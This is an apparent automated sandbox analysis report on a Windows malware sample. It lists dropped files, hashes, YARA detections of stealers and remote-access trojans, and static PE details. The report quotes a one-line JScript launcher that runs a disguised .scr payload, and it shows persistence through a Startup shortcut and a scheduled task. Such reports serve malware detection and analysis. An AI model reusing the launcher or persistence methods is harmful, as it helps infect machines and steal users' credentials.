Preview:	U.v.)....F.VF..r...lgr.#.L...!...~.....K@.Bu..v..........u.m[g5.t......'...0f..8B....,..q.1-..n......x.zN..........U.....J..<.LHb.j.. ..<.>ha..v~}..m.+s.......7.....C ........}...../........8.i..d....#.Q^K./-DQ^.:...S.E.Wu...1.,WY.R8+.,...<\8.=.....'.;.9.U?.8.hZ.'.........L..C.x.v3.8.....w4ub?X...t.r.`\|.[../.....n.%.{W.y......,..1g....+.@J..y.AZXR.....]\'._jS...0.g......>R..CL..m..".......rO.b.f.f_.-.......x.x..+.t./.....d5..4..z....W. j.>...2x'.i.){.Qy..B.(.>....a-.h.....G........u..r.......1. ..{.X...`.A..@....u..o....4......H.+?.t....r.....].. .1...VD..c...OB...R.E.....g...g.%I....y.r..1...OL6.Z...E..+5.....3.C&.....0M.t%.qT..v.g.>X..f"W..n.]l.......2........y.-.k..3#..sCGE.P..W..7....X..{.f^.7....W..t......\|\|WF.$.,B`O....'.b..tpKu]...C.@.C.........z..s.....>y[.:^....Dn..Y..).2y.....t8....7.E17MW."G..df.V.Plr8...5..........#.......;!,..g...u9P...f.}..{...h'.....^....p-/...i....a...r\..b......n.5...Fo.ZU..%../>8.<c....

C:\Users\user\AppData\Local\Temp\Wireless

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	65112
Entropy (8bit):	7.996543686201188
Encrypted:	true
SSDEEP:	1536:BPYs0v/j8Hkrp5mua/2KosFnVD6i5nckhaGx54u/zb:CsO8Hipna/l6Av
MD5:	DF9A85AF5771EA736A104B6E3EB86F0B
SHA1:	319CB80EED888D089AB5B6944ADBCBE89C3195EB
SHA-256:	CEE5172F67CACBC90062C13713A08561B6984CB6C3C98663B7E541445B2FD492
SHA-512:	8E7AEDBE38BEDF9A0C167F778EB7678B6AD73F56E1F1196EAF771C01B8D6CD2A99FF015190EFCF3F7E340979E501172D2D606E3E3B9AE53873AB9244AAF10EB9
Malicious:	true
Preview:	%.4m..z.,..9.).._......lV.....B1.bb.....2.AN...bb..L..6.!;..vHiJ..l.Nl..F\|3_....p......s.S..-...A.e...Q.z...MPC..7.dpK..Xy...<...!L.... h...F......n(.......,fO..c....A3!...gL......].$....1.edn!..r.Uh~..?"....{. yN.....Av..Z@.......I..qN.....O5.L.[.q.N..s. .v...;..].B{.1.h...c...O.1.e.-].Y6=..\.9l U...$=.K.!.j.w..7..wt.@77.oLV.6..!...q./....xL .-._f...E..c..C~O.9...v.eH.......?...2k.(=H.....$j(...;Qb....j].T..P.h...j.}....^.D....3.'.....in...3y...q.[!.A.f...}y..j%$a.p^Ss.Z....a..#.5>k..u...5..y........1..~..~..d..}L\|.ci.sfT..i......G..i?.....w..L.zv>.....X...27...X....&L......gnK{[.kV.....W)...a.T..M.%..iC...y.A....3duJ.w+.H7....H.....6......a.s3.X..nV..a..q........a9.D.1j?....If.s^..s.]..8.....p.P.};....m....E'.g..k..M{...$..<.v6.&...&u....PH&dMT%.f..#B0v4.... ..B.s.~..u.E.BQ'..m.F5.....b..\|..o0{c..V..W.S....R..R.B:.W.4.....%.Q..'.....U$..[.yhx..yF..\|./..........v.j..g......ft.NA...-nV.r.=.g.E.!"J.A.bp...n.....1.:....K;...E..p...A.

C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000142101\build2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	492544
Entropy (8bit):	6.391116117275591
Encrypted:	false
SSDEEP:	12288:UHdftnB3Zp+52J9+62HHLhJ3er8XSwW0:UNz3ZwwJ9+7HFnXP
MD5:	F9A4F6684D1BF48406A42921AEBC1596
SHA1:	C9186FF53DE4724EDE20C6485136B4B2072BB6A6
SHA-256:	E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
SHA-512:	67294A47DFEF6ABA404939497C403F93318841E9C5EE28B706F7506B5DFF2630381E28E86F6DCBFDFF2427092A515DB1DC0A04E334E7F8DE8B0B682269FF88FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...<...J...<#..J...<...J...2...J...J...J...<...J...<'..J...< ..J..Rich.J..................PE..L.....jd.....................NA......K............@...........................F.....i"..........................................d.....D.H...........................p....................... 7.......6..@............................................text............................... ..`.data.....?......\|..................@....rsrc...H.....D......n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.760030605070939
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5xXEZz+LAGQ+EBxXvfiZo5uWAX+aJp6/h4I:RiJBJHonwWDaJ0/hJkDvXEhapoRyywWh
MD5:	B11FD7E16E222D604DFEEF154E83939A
SHA1:	3F00113773E4EC6169C9A1F4965387F305158724
SHA-256:	D7B7398F7E8E2D72636502D4AE48DF216A819242EADC6D10A812B55328FEB246
SHA-512:	E33F8ABB207EC6372CB409C6EDB8868B060D58319E0EA7D4BA0AF28C73F3D8E39E9E9162708B01A14CB0B5BAE770598B5D3034B975D3E9BE7532A7B36C685E42
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TrackGuard Technologies\\GuardTrack.scr\" \"C:\\Users\\user\\AppData\\Local\\TrackGuard Technologies\\z\"")

C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\TrackGuard Technologies\z

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	data
Category:	dropped
Size (bytes):	792152
Entropy (8bit):	7.999752041562741
Encrypted:	true
SSDEEP:	12288:S2txcY4Gu0kDVO9n0NZEncdRSu0QqcbI0pLZ3h3r6MorbtDTb85w491BIvgvW6E:f/Tu/4kuu0QqcbxZh3ribh05w4zwgvRE
MD5:	6A22704AE494645CA19955DE0CB879BC
SHA1:	ACC40B89422C32563656441519DF5D2199772398
SHA-256:	F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
SHA-512:	3852D5E7D29BE2B89008C9A970D4770A5D4599D6F75B4927FB56CA12FDC7BA5DB0D2A6425786EC71A57A86342FCFC669E6CFB724683922FEB5175DD369A5D687
Malicious:	true
Preview:	K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'\|.....$...!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.KqBG0..?.....?&9;...%..o.x...v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..\|.'..Y.J...k..B.zW..no..Rk."....\|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l._oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&\|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..\|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........

C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	557056
Entropy (8bit):	6.311657384729558
Encrypted:	false
SSDEEP:	6144:q9DfA3bgFn8PGgNryMVOa/agTyqYYlHg8q16ODfL5DAq6syp2cbYJNLhTx:q9DfW68ugNus+qgZ1zLlDly2b
MD5:	88367533C12315805C059E688E7CDFE9
SHA1:	64A107ADCBAC381C10BD9C5271C2087B7AA369EC
SHA-256:	C6FC5C06AD442526A787989BAE6CE0D32A2B15A12A41F78BACA336B6560997A9
SHA-512:	7A8C3D767D19395CE9FFEF964B0347A148E517982AFCF2FC5E45B4C524FD44EC20857F6BE722F57FF57722B952EF7B88F6249339551949B9E89CF60260F0A714
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A/................0..,...R......^J... ...`....@.. ....................................@..................................J..K....`...O........................................................................... ............... ..H............text...d... ...,.................. ..`.rsrc....O...`...P..................@..@.reloc...............~..............@..B................@J......H.......\|Z...x......<...X....)..............................................(....*..0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~s...(.....%..G~s...(.....%..H~s...(.....%..e~s...(.....~t...(.......o......8......(......s.......sK.......~....}....~...........s....(....o....}......{.....I~s...(....o........9......I~s...(.......8C........~s...(....o....:......{....~u...(....8......{....~v...(.........(...........9........o........(

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	7.618850218567111
Encrypted:	false
SSDEEP:	48:S7SjQDUrvaJno0Pr1DKewkbiW0EAHjUCkME99:ASUD8vaJZr1DgPW9SUCk99
MD5:	5E0A8E102B0EF2FD67F8E0E083F4B99F
SHA1:	21A9D9B85940D3EBEFA15FB849760B6C2BD4D7B9
SHA-256:	FD893C28E95CE10DC41921E79977A75BC2600752C386C41291FAF29DE83613C1
SHA-512:	199CF617BF41DEB001B2EB56B3429CE7DC0D09CDFFBCFA4D525262CA97CB2A50CA7A295AE55D8A631B9098E814147937905D93DDCF8841EF51619E596DB008B3
Malicious:	false
Preview:	........'...............P...............{41744BE4-11C5-494C-A213-BA0CE944938E}.....................RSA1..................v..XU~l2_.......vj....b.... ..&...X.Y...=q...).....`.1.0..~......5DL. ..S>.......<..y...?YOA.... eb.QD..B..<.!..'J..+.'...4fu.z./....]@.y.b...o...).j'......0}B.j..R..-..2.....'=...@....s....;. .v=..;...\$...G....2S....al.ZQ.Q...w...aXzW.....................z..O...........@..j...3.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....).W.[\..k......b..{......m.8............... .........r...6..r.r..U.:.N.Fc..H..P....W......J....X......rj^.S..n..")Px..bm.=.....I.n....[..X3.me....L.v<n...ys.....QljYf=...^...}.R....-.g...{.D3.2-.p=yE.+=.=.z1`/t.<..o.....V.W...a.P}./2-....b?..w6q.Wk.c...a...R.{$.....B.n~.(H....0>..4a...4......:R....CHO1...a..>...........`.t$....ZR....E..k=.(.5.(F.A!.<.....2.W.u.+rS7......p.{p..U.m.6S'..l..L..\|wP]0./D.@.........a#.X..q-......dRLy.4.BSx.:p...+......C0s..W~.....v.&....\|.s.;.H5da...,.".Y*.r{..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	99
Entropy (8bit):	4.901237783596364
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoUkh4E2J5xXK+LAGQ+axXvGgc:HRYF5yjo923RKapaROgc
MD5:	36E7AB4A35DC5D68061BACF9622A9C95
SHA1:	D056707D6151F4CD93B20898789DEF672A706123
SHA-256:	F113CB9545CAFF34A1D0D72A133778EF8216D23FF6AF40500C3963615195844C
SHA-512:	8D77DD2F23A82882BF3CB06C97DF41F1ADB628164FFA8354DC3647E45CFAF18BF4D39143F61CBFCB68CC829D58B8A813AC1BB9D29217C0F48459E11A9957C408
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" ..

C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082156492931411
Encrypted:	false
SSDEEP:	3072:sq6EgY6iChfrUjHcQZwP7h5kQgnKyyeTAXtUSiVlcZqf7D34leqiOLibBOe:nqY6iChawPfkx7yeTAdUblcZqf7DIvL
MD5:	30F46F4476CDC27691C7FDAD1C255037
SHA1:	B53415AF5D01F8500881C06867A49A5825172E36
SHA-256:	3A8F5F6951DAD3BA415B23B35422D3C93F865146DA3CCF7849B75806E0B67CE0
SHA-512:	271AADB524E94ED1019656868A133C9E490CC6F8E4608C8A41C29EFF7C12DE972895A01F171E8F625D07994FF3B723BB308D362266F96CB20DFF82689454C78F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.9...............0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Windows.exe

Download File

Process:	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Windows.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 84%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000142101\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.392740206155609
Encrypted:	false
SSDEEP:	6:4xX55ZsUEZ+lX1uPycLXUetFXqYEp5t/uy0lFXmut0:4NuQ1uPPLnfXVpt0
MD5:	2F9A97652DE149B7C7101AF7C6A72A39
SHA1:	DF6EAF10A5A40CA434958658024F4E9025C17011
SHA-256:	1224745D55801906FE2458D9B7BA60E43CEF04FC6F03A8DD8A4A7D981195E910
SHA-512:	08FCF9A5E969E7344004C1AFAF8DC2B901D314A747CBCB440069D727E27FC1F489EEBB3D15BB771A9234C9860B0EB70D48EBBD0CEC49EAA707E88C747089781C
Malicious:	false
Preview:	....,v.....O.,..Su..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.f.e.d.0.c.9.a.4.d.3.\.H.k.b.s.s.e...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................2.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.906312664956289
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wfJfUGeGT3.exe
File size:	1'411'961 bytes
MD5:	046ebd7e0f619f33de609ea3f126b0d3
SHA1:	37a0b634955eb29f9bc7d3d434838cd729bb7e17
SHA256:	bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555
SHA512:	39afa534b862f9faebb4aa1ff4144a7d53f62adfd389531f75bdf10865fe8d846e79b3138ec90f2e9d4eb92a72e7a856f0c7be857a892a54eb2f2503f3030d10
SSDEEP:	24576:39O/bmU++vQu1TL9yJ5d2m8y7i1HlcoGpJ042jJpUeBk2h:3k/X+75dAyMGDP2dpUYXh
TLSH:	2D6523038B54E472FD2D09706D298A7846B77E2F4301D19BA2E87D793C77C958CDEA82
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%*46........PE..L.....GO.................p....>..B...8.....

File Icon


Icon Hash:	6062f2c8ccccfc04

Static PE Info

General

Entrypoint:	0x403899
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2CF [Fri Feb 24 19:19:43 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [007F16D8h], eax
call 00007F98390C053Bh
push ebp
push 000002B4h
mov dword ptr [007F15F0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 007E95E0h
call 00007F98390C021Dh
call dword ptr [004080B0h]
push eax
mov edi, 008420A0h
push edi
call 00007F98390C020Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [008420A0h], 0022h
mov dword ptr [007F15F8h], eax
mov eax, edi
jne 00007F98390BDB0Ah
push 00000022h
pop esi
mov eax, 008420A2h
push esi
push eax
call 00007F98390BFEE1h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F98390BDB93h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F98390BDB0Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x473000	0x14f2a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3f9000	0x948	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6f1c	0x7000	64fef99d80ead9051b6e85267342c734	False	0.6666434151785714	data	6.524017251100935	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x3e66dc	0x200	f8e9fc8c226177087968ccda63fbab7d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3f2000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x473000	0x14f2a	0x15000	c928ce6a41e0b0d551080b88e09341f7	False	0.5080101376488095	data	5.155059564909495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x488000	0x320e	0x3400	4599932c653c719deb4325f61a884dbc	False	0.4661207932692308	data	4.729420728460667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4731f0	0x11028	Device independent bitmap graphic, 128 x 256 x 32, image size 69632	English	United States	0.4625244000459295
RT_ICON	0x484218	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.7256916192026037
RT_ICON	0x486880	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.7809653916211293
RT_DIALOG	0x4879a8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x487aa8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x487bc4	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x487c24	0x30	data	English	United States	0.8958333333333334
RT_MANIFEST	0x487c54	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	04:46:52
Start date:	31/08/2024
Path:	C:\Users\user\Desktop\wfJfUGeGT3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wfJfUGeGT3.exe"
Imagebase:	0x400000
File size:	1'411'961 bytes
MD5 hash:	046EBD7E0F619F33DE609EA3F126B0D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

